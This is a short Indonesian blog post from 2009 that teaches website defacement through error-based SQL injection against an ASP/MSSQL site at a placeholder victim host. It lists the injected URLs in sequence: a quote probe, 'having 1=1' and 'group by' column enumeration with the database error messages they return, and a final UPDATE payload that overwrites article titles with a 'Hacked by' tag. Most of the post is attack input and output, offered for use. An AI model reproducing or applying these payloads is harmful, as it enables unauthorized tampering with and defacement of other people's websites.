Jumat, 18 September 2009

+Deface dengan SQL injection+

Nie gw kasih contoh nya.......

=> http://korban.site/artikel.asp?naskah_id=102

untuk mengetahui apakah web tersebut terkena bugs sql injection, kita akan menambahkan satu karakter ' setelah kode artikel mejadi

=> http://korban.site/artikel.asp?naskah_id=102'

Terjadi Error???

Microsoft OLE DB Provider for SQL Server error ‘80040e14'

Unclosed quotation mark before the character string ‘102' order by creationdate DESC’.

/artikel.asp, line 230

berarti bisa dipastikan klo website tersebut terkena bugs

terus qt coba lagi dgn menambahkan

having 1=1;–

mis :

=> http://korban.site/artikel.asp?naskah_id=102' having 1=1;–




maka akan terjadi errornya seperti ini


Microsoft OLE DB Provider for SQL Server error ‘80040e14''

Column ‘py_Naskah.naskah_id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/artikel.asp, line 230


py_Naskah.naskah_id ini adalah nama tabel dan kolom database
py_Naskah => nama tabel
naskah_id => nama kolom

sekarang yg harus kita lakukan adalah mencari tabel berikutnya
mis :

=> http://korban.site/artikel.asp?naskah_id=102 group by py_Naskah.naskah_id having 1=1;–

terjadi error lagi???


Microsoft OLE DB Provider for SQL Server error ‘80040e14'

Column ‘py_Naskah.category’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230


sekarang kita dapat py_Naskah.category
berarti ditambahkan di urlnya
mis :

=> http://korban.site/artikel.asp?naskah_id=102' group by py_Naskah.category,py_Naskah.naskah_id having 1=1;–

error lagi????


Microsoft OLE DB Provider for SQL Server error ‘80040e14'

Column ‘py_Naskah.Publish’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230


rubah lagi urlnya menjadi

=> http://korban.site/artikel.asp?naskah_id=102' group by py_Naskah.category,py_Naskah.naskah_id,py_Naskah.Publish having 1=1;–

kita sudah dapat nama kolom judulnya yaitu : py_Naskah.title

untuk merubahnya

=> http://korban.site/artikel.asp?naskah_id=102' update py_Naskah set title=’Hacked by lxmp2t’;–

gitu aje. semoga bisa berguna dan dapat dipelajari oke...




Diposting oleh arob di 11.09  

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
nɐʇ dnʞnɔ qoɹɐ © 2008. Arob Muadz Comunnity by: Echo